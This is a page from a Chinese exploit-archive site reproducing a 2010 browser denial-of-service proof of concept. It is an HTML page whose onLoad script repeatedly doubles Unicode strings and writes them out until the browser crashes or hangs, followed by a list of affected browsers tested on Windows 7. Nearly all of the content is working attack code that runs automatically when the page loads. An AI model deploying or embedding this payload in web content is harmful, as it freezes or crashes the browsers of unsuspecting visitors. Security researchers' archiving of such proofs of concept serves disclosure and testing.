首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
All Browsers - Long Unicode DoS PoC
来源:vfocus.net 作者:Dr_IDE 发布时间:2010-05-04  
<html>
<title>Dr_IDE - All Browsers - Long Unicode DoS PoC</title>
<head>
<script>
function boom()
 {
 //The number of strings increases the amount of memory consumed, quicker crash where applicable.
 var longunistring1 = unescape("%u4141%u4141");
 var longunistring2 = unescape("%u4242%u4242");
 var longunistring3 = unescape("%u4343%u4343");
 var longunistring4 = unescape("%u4444%u4444");
 
 for(i=0; i <= 60 ; ++i) //This number is very sensitive. If you go far over 60 IE won't "work"
 {
  longunistring1+=longunistring1;
  longunistring2+=longunistring2;
  longunistring3+=longunistring3;
  longunistring4+=longunistring4;
  document.write(longunistring1);
  document.write(longunistring2);
  document.write(longunistring3);
  document.write(longunistring4);
 }    
 document.write(longunistring1);
 document.write(longunistring2);
 document.write(longunistring3);
 document.write(longunistring4);
}
</script>
</head>
<body onLoad="boom()">
<br>Tested on Windows 7:
<br>Firefox 3.6.4  (CrashReporter)
<br>IE 8.0.7600.16385  (Hangs, must quit)
<br>Lunascape6   (Crashes with Gecko Engine)[Firefox mode]
<br>Lunascape6   (Crashes with Webkit Engine)[Safari mode]
<br>Lunascape6   (Crashes with Trident Engine)[IE mode]
<br>Opera 10.51   (Hangs, must kill)
<br>Safari 4.0.5  (Hangs, must kill)
</body>
</html>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Firefox 3.6.3 Fork Bomb DoS
·Winamp v5.572 0day Local Crash
·All browsers 0day Crash Exploi
·ProSSHD 1.2 remote post-auth e
·JavaScriptCore.dll Stack Exhau
·TFTPGUI v1.4.5 Long Transport
·Acritum Femitter Server v1.03
·RealVNC VNC Server Free Editio
·Urgent Backup 3.20 / ABC Backu
·Knowledge Root version 0.9.9.5
·Google Chrome acronym tag deni
·PHP-Nuke 7.0/8.1/8.1.35 Wormab
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved